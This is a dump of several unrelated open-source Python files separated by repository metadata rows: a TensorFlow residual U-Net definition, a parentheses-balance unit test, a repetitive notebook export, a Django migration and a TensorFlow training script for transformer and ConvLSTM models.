.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr1')
.relu(name='conv6_rl1')
.g_residual_block(use_dropout=False, name='conv6_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual6', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr2')
.relu(name='conv6_rl2')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv6_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr3')
.relu(name='conv6_rl3')
.upsampling(name='conv6_up'))
(self.feed('conv6_up', 'conv3_add_residual3')
.g_concat(name='conv7_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn0')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv7_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr1')
.relu(name='conv7_rl1')
.g_residual_block(use_dropout=False, name='conv7_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual4', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr2')
.relu(name='conv7_rl2')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv7_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr3')
.relu(name='conv7_rl3')
.upsampling(name='conv7_up'))
(self.feed('conv7_up', 'conv2_add_residual6')
.g_concat(name='conv8_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn0')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv8_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr1')
.relu(name='conv8_rl1')
.g_residual_block(use_dropout=False, name='conv8_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv8_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv8_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr2')
.relu(name='conv8_rl2')
.g_conv('C4', 'C4', 3, 32, 1, 1, padding='SAME', name='conv8_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr3')
.relu(name='conv8_rl3')
.upsampling(name='conv8_up'))
(self.feed('conv8_up', 'conv1_add_residual8')
.g_concat(name='conv9_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv9_bn0')
.g_conv('C4', 'C4', 3, 32, 1, 1, padding='SAME', name='conv9_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv9_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv9_dr1')
.relu(name='conv9_rl1')
.g_conv('C4', 'C4', 3, 3, 1, 1, padding='SAME', name='conv9_2')
.g_avg_global_pool(name='conv9_gl'))
class G_UNetResidual(Network):
def getOutput(self):
return self.layers['conv9_gl']
def setup(self, is_training, num_classes):
(self.feed('data')
.g_conv('Z2', 'C4', 7, 32, 1, 1, padding='SAME', name='conv1_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv1_bn1')
#.dropout(keep_prob=0.9, is_training=is_training, name='conv1_dr1')
.relu(name='conv1_rl1')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv1_mp1'))
(self.feed('conv1_mp1')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv2_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv2_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv2_dr1')
.relu(name='conv2_rl1')
.g_residual_block(use_dropout=False, name='conv2_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv2_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv2_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv2_dr2')
.relu(name='conv2_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv2_mp1'))
(self.feed('conv2_mp1')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv3_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv3_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv3_dr1')
.relu(name='conv3_rl1')
.g_residual_block(use_dropout=False, name='conv3_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv3_residual4', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv3_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv3_dr2')
.relu(name='conv3_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv3_mp1'))
(self.feed('conv3_mp1')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv4_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv4_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv4_dr1')
.relu(name='conv4_rl1')
.g_residual_block(use_dropout=False, name='conv4_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv4_residual6', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv4_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv4_dr2')
.relu(name='conv4_rl2')
.max_pool(2, 2, 2, 2, padding='VALID', name='conv4_mp1'))
(self.feed('conv4_mp1')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv5_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr1')
.relu(name='conv5_rl1')
.g_residual_block(use_dropout=False, name='conv5_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv5_residual4')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr2')
.relu(name='conv5_rl2')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv5_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv5_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv5_dr3')
.relu(name='conv5_rl3')
.upsampling(name='conv5_up'))
(self.feed('conv5_up', 'conv4_rl2')
.g_concat(name='conv6_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn0')
.g_conv('C4', 'C4', 3, 256, 1, 1, padding='SAME', name='conv6_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr1')
.relu(name='conv6_rl1')
.g_residual_block(use_dropout=False, name='conv6_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual4', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual5', padding='SAME')
.g_residual_block(use_dropout=False, name='conv6_residual6', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr2')
.relu(name='conv6_rl2')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv6_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv6_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv6_dr3')
.relu(name='conv6_rl3')
.upsampling(name='conv6_up'))
(self.feed('conv6_up', 'conv3_rl2')
.g_concat(name='conv7_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn0')
.g_conv('C4', 'C4', 3, 128, 1, 1, padding='SAME', name='conv7_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr1')
.relu(name='conv7_rl1')
.g_residual_block(use_dropout=False, name='conv7_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual3', padding='SAME')
.g_residual_block(use_dropout=False, name='conv7_residual4', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr2')
.relu(name='conv7_rl2')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv7_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv7_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv7_dr3')
.relu(name='conv7_rl3')
.upsampling(name='conv7_up'))
(self.feed('conv7_up', 'conv2_rl2')
.g_concat(name='conv8_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn0')
.g_conv('C4', 'C4', 3, 64, 1, 1, padding='SAME', name='conv8_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr1')
.relu(name='conv8_rl1')
.g_residual_block(use_dropout=False, name='conv8_residual1', padding='SAME')
.g_residual_block(use_dropout=False, name='conv8_residual2', padding='SAME')
.g_residual_block(use_dropout=False, name='conv8_residual3', padding='SAME')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn2')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr2')
.relu(name='conv8_rl2')
.g_conv('C4', 'C4', 3, 32, 1, 1, padding='SAME', name='conv8_2')
.g_batch_norm_tensorflow(input_type='C4', name='conv8_bn3')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv8_dr3')
.relu(name='conv8_rl3')
.upsampling(name='conv8_up'))
(self.feed('conv8_up', 'conv1_rl1')
.g_concat(name='conv9_i')
.g_batch_norm_tensorflow(input_type='C4', name='conv9_bn0')
.g_conv('C4', 'C4', 3, 32, 1, 1, padding='SAME', name='conv9_1')
.g_batch_norm_tensorflow(input_type='C4', name='conv9_bn1')
#.dropout(keep_prob=0.8, is_training=is_training, name='conv9_dr1')
.relu(name='conv9_rl1')
.g_conv('C4', 'C4', 3, 3, 1, 1, padding='SAME', name='conv9_2')
.g_avg_global_pool(name='conv9_gl'))
| 63.415385 | 96 | 0.595827 | 2,654 | 20,610 | 4.28636 | 0.033534 | 0.099596 | 0.09353 | 0.113572 | 0.982155 | 0.982155 | 0.982155 | 0.982155 | 0.981364 | 0.971343 | 0 | 0.059524 | 0.254148 | 20,610 | 324 | 97 | 63.611111 | 0.680523 | 0.128093 | 0 | 0.868526 | 0 | 0 | 0.187036 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015936 | false | 0 | 0.003984 | 0.007968 | 0.035857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8552b83691715a1f9be19d8db23e6ef339d613d8 | 1,568 | py | Python | balance_checker/balance_checker_test.py | JuanJUribe/google-problems | 6b3a7a3cc201c9934f9ebfc414ecca4498fbc099 | [
"MIT"
] | null | null | null | balance_checker/balance_checker_test.py | JuanJUribe/google-problems | 6b3a7a3cc201c9934f9ebfc414ecca4498fbc099 | [
"MIT"
] | null | null | null | balance_checker/balance_checker_test.py | JuanJUribe/google-problems | 6b3a7a3cc201c9934f9ebfc414ecca4498fbc099 | [
"MIT"
] | null | null | null | import sys
import unittest
from balance_checker import is_string_balanced
class TestBueller(unittest.TestCase):
def setUp(self):
pass
def test_sinlge_balanced(self):
string = "(This string is balanced)"
self.assertTrue(is_string_balanced(string))
def test_multiple_balanced_1(self):
string = "(This (string is) balanced)"
self.assertTrue(is_string_balanced(string))
def test_multiple_balanced_2(self):
string = "(This) string is (balanced)"
self.assertTrue(is_string_balanced(string))
def test_multiple_balanced_3(self):
string = "(This) (string is (balanced))"
self.assertTrue(is_string_balanced(string))
def test_wrong_order(self):
string = ")This string is not balanced("
self.assertFalse(is_string_balanced(string))
def test_only_open(self):
string = "(This (string is not balanced("
self.assertFalse(is_string_balanced(string))
def test_only_close(self):
string = ")This )string is not balanced)"
self.assertFalse(is_string_balanced(string))
def test_unbalanced_1(self):
string = "(This) string is not balanced)"
self.assertFalse(is_string_balanced(string))
def test_unbalanced_2(self):
string = "(This) string is not balanced)("
self.assertFalse(is_string_balanced(string))
def test_unbalanced_3(self):
string = "((This string is not balanced)("
self.assertFalse(is_string_balanced(string))
if __name__ == '__main__':
unittest.main() | 30.745098 | 52 | 0.679847 | 193 | 1,568 | 5.243523 | 0.181347 | 0.086957 | 0.173913 | 0.197628 | 0.829051 | 0.829051 | 0.823123 | 0.823123 | 0.823123 | 0.823123 | 0 | 0.004894 | 0.218112 | 1,568 | 51 | 53 | 30.745098 | 0.820555 | 0 | 0 | 0.263158 | 0 | 0 | 0.189293 | 0 | 0 | 0 | 0 | 0 | 0.263158 | 1 | 0.289474 | false | 0.026316 | 0.078947 | 0 | 0.394737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
85b0ec6aea9ae0941461343880ad276ee192e94c | 644 | py | Python | hola_nbdev/None.py | arlingvazquez/hola_nbdev | 6f6a114873c3d93f0bd366403a0e71cc03f7c687 | [
"Apache-2.0"
] | null | null | null | hola_nbdev/None.py | arlingvazquez/hola_nbdev | 6f6a114873c3d93f0bd366403a0e71cc03f7c687 | [
"Apache-2.0"
] | 2 | 2021-09-28T05:35:55.000Z | 2022-02-26T10:03:49.000Z | hola_nbdev/None.py | arlingva/hola_nbdev | 6f6a114873c3d93f0bd366403a0e71cc03f7c687 | [
"Apache-2.0"
] | null | null | null |
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata") | 9.2 | 19 | 0.678571 | 92 | 644 | 4.5 | 0.043478 | 0.388889 | 0.666667 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0.142857 | 644 | 70 | 20 | 9.2 | 0.75 | 0.177019 | 0 | 1 | 0 | 0 | 0.273267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
a41472599b51498236d0641c4a94bf2e70d4c20c | 106 | py | Python | clients/models/__init__.py | vovagod/projectseven | 6a43ea8a7e057582376f6074941dca986a51f268 | [
"BSD-2-Clause"
] | null | null | null | clients/models/__init__.py | vovagod/projectseven | 6a43ea8a7e057582376f6074941dca986a51f268 | [
"BSD-2-Clause"
] | 7 | 2020-01-06T18:22:36.000Z | 2021-08-31T20:12:53.000Z | clients/models/__init__.py | vovagod/projectseven | 6a43ea8a7e057582376f6074941dca986a51f268 | [
"BSD-2-Clause"
] | null | null | null | from clients.models.clients import Clients
from clients.models.importduplication import ImportDuplication
| 35.333333 | 62 | 0.886792 | 12 | 106 | 7.833333 | 0.416667 | 0.234043 | 0.361702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075472 | 106 | 2 | 63 | 53 | 0.959184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a41585ffd9b71f957a0711f4bcbaa520a584a063 | 2,350 | py | Python | data/migrations/0005_auto_20200306_1150.py | Not-Morgan/PGDBWebServer | 9777773db763a13f168da633c69b9271f9da24b1 | [
"MIT"
] | 1 | 2021-05-25T04:30:12.000Z | 2021-05-25T04:30:12.000Z | data/migrations/0005_auto_20200306_1150.py | Not-Morgan/PGDBWebServer | 9777773db763a13f168da633c69b9271f9da24b1 | [
"MIT"
] | 70 | 2020-02-20T23:43:52.000Z | 2022-03-12T00:08:12.000Z | data/migrations/0005_auto_20200306_1150.py | Not-Morgan/PGDBWebServer | 9777773db763a13f168da633c69b9271f9da24b1 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.9 on 2020-03-06 19:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data', '0004_loggedaction'),
]
operations = [
migrations.AlterModelOptions(
name='student',
options={'ordering': ['active', 'last', 'first']},
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_10_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_10_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_11_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_11_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_12_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_12_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_8_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_8_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_9_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_9_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
]
| 34.558824 | 86 | 0.586383 | 246 | 2,350 | 5.394309 | 0.211382 | 0.150716 | 0.188395 | 0.218538 | 0.840995 | 0.840995 | 0.840995 | 0.840995 | 0.801055 | 0.801055 | 0 | 0.069319 | 0.294043 | 2,350 | 67 | 87 | 35.074627 | 0.730561 | 0.019149 | 0 | 0.672131 | 1 | 0 | 0.115936 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.016393 | 0 | 0.065574 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a477062444d49c9977f97f00dd5dae2f4d698ff8 | 9,425 | py | Python | train_cpu.py | Skye777/transformer | 177834bcb55e59f8ea0fbe666734c148effbec8d | [
"Apache-2.0"
] | null | null | null | train_cpu.py | Skye777/transformer | 177834bcb55e59f8ea0fbe666734c148effbec8d | [
"Apache-2.0"
] | null | null | null | train_cpu.py | Skye777/transformer | 177834bcb55e59f8ea0fbe666734c148effbec8d | [
"Apache-2.0"
] | null | null | null | """
@author: Skye Cui
@file: train_cpu.py
@time: 2021/2/20 16:35
@description:
"""
import os
os.environ["LOGURU_INFO_COLOR"] = "<green>"
import time
import re
import tensorflow as tf
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
from loguru import logger
from progress.spinner import MoonSpinner
from component.input import *
from model import UTransformer, StackConvlstm, UConvlstm
from component.loss import Loss
from hparams import Hparams
hparams = Hparams()
parser = hparams.parser
hp = parser.parse_args()
def transformer_trainer():
train_dataset, test_dataset = train_input_fn()
optimizer = tf.keras.optimizers.Adam(learning_rate=hp.lr)
model = UTransformer(hp)
model_loss = Loss(model)
checkpoint_file = hp.ckpt
if checkpoint_file == '':
checkpoint_file = 'transformer-ckp_0'
else:
model.load_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}')
logger.add(f"{hp.logdir}/{hp.in_seqlen}_{hp.out_seqlen}_{hp.lead_time}_train.log", enqueue=True)
for epoch in range(hp.num_epochs):
for step, (x_batch_train, ys_batch_train) in enumerate(train_dataset):
start = time.perf_counter()  # time.clock() was removed in Python 3.8
with tf.GradientTape() as tape:
y_predict = model([x_batch_train, ys_batch_train], training=True)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, ys_batch_train[1]])
grads = tape.gradient(loss, model.trainable_weights)
optimizer.apply_gradients(zip(grads, model.trainable_weights))
elapsed = (time.perf_counter() - start)
template = ("step {} loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}."
"({:1.2f}s/step)")
logger.info(template.format(step, loss.numpy(), loss_ssim.numpy(), loss_l2.numpy(), loss_l1.numpy(), elapsed))
if epoch % hp.num_epoch_record == 0:
loss_test = 0
loss_ssim_test = 0
loss_l2_test = 0
loss_l1_test = 0
count = 0
spinner = MoonSpinner('Testing ')
for step, (x_batch_test, ys_batch_test) in enumerate(test_dataset):
y_predict = model([x_batch_test, ys_batch_test], training=False)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, ys_batch_test[1]])
loss_ssim_test += loss_ssim.numpy()
loss_l2_test += loss_l2.numpy()
loss_l1_test += loss_l1.numpy()
loss_test += loss.numpy()
count += 1
spinner.next()
spinner.finish()
logger.info("TEST COMPLETE!")
template = ("TEST DATASET STATISTICS: "
"loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}.")
logger.info(template.format(loss_test/count, loss_ssim_test/count, loss_l2_test/count, loss_l1_test/count))
total_epoch = int(re.findall(r"\d+", checkpoint_file)[0])
checkpoint_file = checkpoint_file.replace(f'_{total_epoch}', f'_{total_epoch + 1}')
model.save_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}', save_format='tf')
logger.info("Saved checkpoint_file {}".format(checkpoint_file))
def u_convlstm_trainer():
train_dataset, test_dataset = train_input_fn()
optimizer = tf.keras.optimizers.Adam(learning_rate=hp.lr)
model = UConvlstm(hp)
model_loss = Loss(model)
checkpoint_file = hp.ckpt
if checkpoint_file == '':
checkpoint_file = 'uconvlstm-ckp_0'
else:
model.load_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}')
logger.add(f"{hp.logdir}/{hp.in_seqlen}_{hp.out_seqlen}_{hp.lead_time}_train.log", enqueue=True)
for epoch in range(hp.num_epochs):
for step, (x_batch_train, y_batch_train) in enumerate(train_dataset):
start = time.perf_counter()  # time.clock() was removed in Python 3.8
with tf.GradientTape() as tape:
y_predict = model(x_batch_train, training=True)
print("y_pred:", y_predict.shape)
print("y_batch:", y_batch_train.shape)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, y_batch_train])
grads = tape.gradient(loss, model.trainable_weights)
optimizer.apply_gradients(zip(grads, model.trainable_weights))
elapsed = (time.perf_counter() - start)
template = ("step {} loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}."
"({:1.2f}s/step)")
logger.info(
template.format(step, loss.numpy(), loss_ssim.numpy(), loss_l2.numpy(), loss_l1.numpy(), elapsed))
if epoch % hp.num_epoch_record == 0:
loss_test = 0
loss_ssim_test = 0
loss_l2_test = 0
loss_l1_test = 0
count = 0
spinner = MoonSpinner('Testing ')
for step, (x_batch_test, y_batch_test) in enumerate(test_dataset):
y_predict = model(x_batch_test, training=False)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, y_batch_test])
loss_ssim_test += loss_ssim.numpy()
loss_l2_test += loss_l2.numpy()
loss_l1_test += loss_l1.numpy()
loss_test += loss.numpy()
count += 1
spinner.next()
spinner.finish()
logger.info("TEST COMPLETE!")
template = ("TEST DATASET STATISTICS: "
"loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}.")
logger.info(
template.format(loss_test / count, loss_ssim_test / count, loss_l2_test / count, loss_l1_test / count))
total_epoch = int(re.findall(r"\d+", checkpoint_file)[0])
checkpoint_file = checkpoint_file.replace(f'_{total_epoch}', f'_{total_epoch + 1}')
model.save_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}', save_format='tf')
logger.info("Saved checkpoint_file {}".format(checkpoint_file))
def convlstm_trainer():
train_dataset, test_dataset = train_input_fn()
optimizer = tf.keras.optimizers.Adam(learning_rate=hp.lr)
model = StackConvlstm(hp)
model_loss = Loss(model)
checkpoint_file = hp.ckpt
if checkpoint_file == '':
checkpoint_file = 'convlstm-ckp_0'
else:
model.load_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}')
logger.add(f"{hp.logdir}/{hp.in_seqlen}_{hp.out_seqlen}_{hp.lead_time}_train.log", enqueue=True)
for epoch in range(hp.num_epochs):
for step, (x_batch_train, y_batch_train) in enumerate(train_dataset):
start = time.perf_counter()  # time.clock() was removed in Python 3.8
with tf.GradientTape() as tape:
y_predict = model(x_batch_train, training=True)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, y_batch_train])
grads = tape.gradient(loss, model.trainable_weights)
optimizer.apply_gradients(zip(grads, model.trainable_weights))
elapsed = (time.perf_counter() - start)
template = ("step {} loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}."
"({:1.2f}s/step)")
logger.info(template.format(step, loss.numpy(), loss_ssim.numpy(), loss_l2.numpy(), loss_l1.numpy(), elapsed))
if epoch % hp.num_epoch_record == 0:
loss_test = 0
loss_ssim_test = 0
loss_l2_test = 0
loss_l1_test = 0
count = 0
spinner = MoonSpinner('Testing ')
for step, (x_batch_test, y_batch_test) in enumerate(test_dataset):
y_predict = model(x_batch_test, training=False)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, y_batch_test])
loss_ssim_test += loss_ssim.numpy()
loss_l2_test += loss_l2.numpy()
loss_l1_test += loss_l1.numpy()
loss_test += loss.numpy()
count += 1
spinner.next()
spinner.finish()
logger.info("TEST COMPLETE!")
template = ("TEST DATASET STATISTICS: "
"loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}.")
logger.info(template.format(loss_test/count, loss_ssim_test/count, loss_l2_test/count, loss_l1_test/count))
total_epoch = int(re.findall(r"\d+", checkpoint_file)[0])
checkpoint_file = checkpoint_file.replace(f'_{total_epoch}', f'_{total_epoch + 1}')
model.save_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}', save_format='tf')
logger.info("Saved checkpoint_file {}".format(checkpoint_file))
if __name__ == '__main__':
# transformer_trainer()
# u_convlstm_trainer()
convlstm_trainer()
